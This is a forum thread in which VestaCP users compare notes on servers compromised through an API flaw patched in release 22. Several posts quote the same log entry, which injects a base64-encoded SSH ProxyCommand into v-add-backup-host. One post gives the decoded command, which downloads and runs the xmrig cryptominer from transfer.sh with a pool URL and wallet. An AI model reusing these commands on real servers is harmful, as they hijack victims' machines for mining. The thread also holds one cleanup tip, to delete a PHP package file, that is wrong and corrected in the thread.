have been HACKED ! by xaxaxa.eu

[sauvegardezvous99]

Can you send a more informations about creation time of the files? Vesta Dev team has patched this issue with release 22, for further investigation we need to be sure that the infection was after upgrade to 22.

to answer your question, I was indeed on 20 version.

Code: Select all

[xxx@two /]# cd /usr/local/vesta/bin
[xxx@two bin]# ./v-list-sys-vesta-updates
PKG          VER    REL  ARCH    UPDT  DATE
---          ---    ---  ----    ----  ----
vesta        0.9.8  20   x86_64  yes   2018-04-09
vesta-php    0.9.8  17   x86_64  yes   2016-11-26
vesta-nginx  0.9.8  17   x86_64  yes   2016-11-26

[sauvegardezvous99]

you're up to date, good so far. now you need to clean your server - my point of view: Do not trust a infected server anymore. Better install a new one and migrate the users there.

as you said, I've shutdown the hacked server and move manually all users to another one.
no chance to take.

thank you for all your great advices.

[deanhills]

Can you send a more informations about creation time of the files? Vesta Dev team has patched this issue with release 22, for further investigation we need to be sure that the infection was after upgrade to 22.

I'm going to wait until the outcome of your research and am looking forward to the results before I do anything. My panel is on automatic upgrades - I'm sure most of the user panels are that way.

Only thing that worried me tonight was the dead.file in my file directory and there was an IP from Korea trying to log in with SSH - I've since banned his IP with my Fail2Ban - hopefully there won't be more to follow.

Once I restarted VestaCP tonight everything was fine and when I did research at UNIX about the dead.file it didn't look as though the issue belonged to VestaCP. I'm not sure about that though.

Only bad part was when I mentioned this to my VPS Host they were worried and thought immediately I was hacked because of this thread at VestaCP. I wasn't hacked.

We'll be grateful if you could respond positively from the Admin of VestaCP so our VPS Hosts can have peace of mind about our VestaCP installations. Thanks.

[ram108]

Look on this file or similar : /etc/cron/d/php5
It's calling another file : /usr/lib/php5/sessionclean
If you are sure what you are doing, delete them both.

sessionclean is a part of php package and should not be removed.

[Spheerys]

you are are right ! I will edit my post. thanks !

[tombabomba]

I got hacked as well. 3 vesta server, only 2 of them got hacked.

initially, I didn't know whats going on, so I removed execution permission from /tmp, and partially stopped it.
later found his forum and applied the updates.

Thanks Vesta team for your help and quick release of patch.

[cybersa]

My Website was Hacked on Jun 22 around 11:10 PM UTC. My Server get upgraded to latest version automatically.But i think server was infected before that.

I have removed the miner file under /tmp/xmrig. Then i have analyzed the log of server to find the root cause and found following things:

1. No new user(sysroot) has been created as mentioned in the first post's script.
2. No New Cron Jobs has been added.
3. xmrig was ran with this cmd:

Code: Select all

./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=1 --donate-level=1 --background

4. Found this log in /var/log/vesta/error.log

Code: Select all

2018-06-22 23:13:28 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]

Decode Version:

Code: Select all

cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/eyz4z/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null

My OS: Ubuntu 16

FYI
@ScIT

[semasping]

+1 for the last post.
I have the same code in /var/log/vesta/error.log

Code: Select all

2018-06-23 04:01:01 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]

Code: Select all

./v-list-sys-vesta-updates
PKG                VER    REL  ARCH   UPDT  DATE
---                ---    ---  ----   ----  ----
vesta              0.9.8  22   amd64  yes   2018-06-25
vesta-php          0.9.8  22   amd64  yes   2018-06-29
vesta-nginx        0.9.8  22   amd64  yes   2018-06-29
vesta-ioncube      0.9.8  21   amd64  yes   2018-06-29
vesta-softaculous  0.9.8  21   amd64  yes   2018-06-29

[ScIT]

+1 for the last post.
I have the same code in /var/log/vesta/error.log

Code: Select all

2018-06-23 04:01:01 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]

Code: Select all

./v-list-sys-vesta-updates
PKG                VER    REL  ARCH   UPDT  DATE
---                ---    ---  ----   ----  ----
vesta              0.9.8  22   amd64  yes   2018-06-25
vesta-php          0.9.8  22   amd64  yes   2018-06-29
vesta-nginx        0.9.8  22   amd64  yes   2018-06-29
vesta-ioncube      0.9.8  21   amd64  yes   2018-06-29
vesta-softaculous  0.9.8  21   amd64  yes   2018-06-29

Still the same question: Was the infection before or after the update to release 22?

There was a security issue in the api, so it was possible to run api commands like v-add-backup-host. The issue is resolved with R22. If your system is infected, the savest way is to reinstall the server and migrate user data.

[semasping]

+1 for the last post.
I have the same code in /var/log/vesta/error.log

Code: Select all

2018-06-23 04:01:01 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]

Code: Select all

./v-list-sys-vesta-updates
PKG                VER    REL  ARCH   UPDT  DATE
---                ---    ---  ----   ----  ----
vesta              0.9.8  22   amd64  yes   2018-06-25
vesta-php          0.9.8  22   amd64  yes   2018-06-29
vesta-nginx        0.9.8  22   amd64  yes   2018-06-29
vesta-ioncube      0.9.8  21   amd64  yes   2018-06-29
vesta-softaculous  0.9.8  21   amd64  yes   2018-06-29

Still the same question: Was the infection before or after the update to release 22?

There was a security issue in the api, so it was possible to run api commands like v-add-backup-host. The issue is resolved with R22. If your system is infected, the savest way is to reinstall the server and migrate user data.

The system was infected before the update.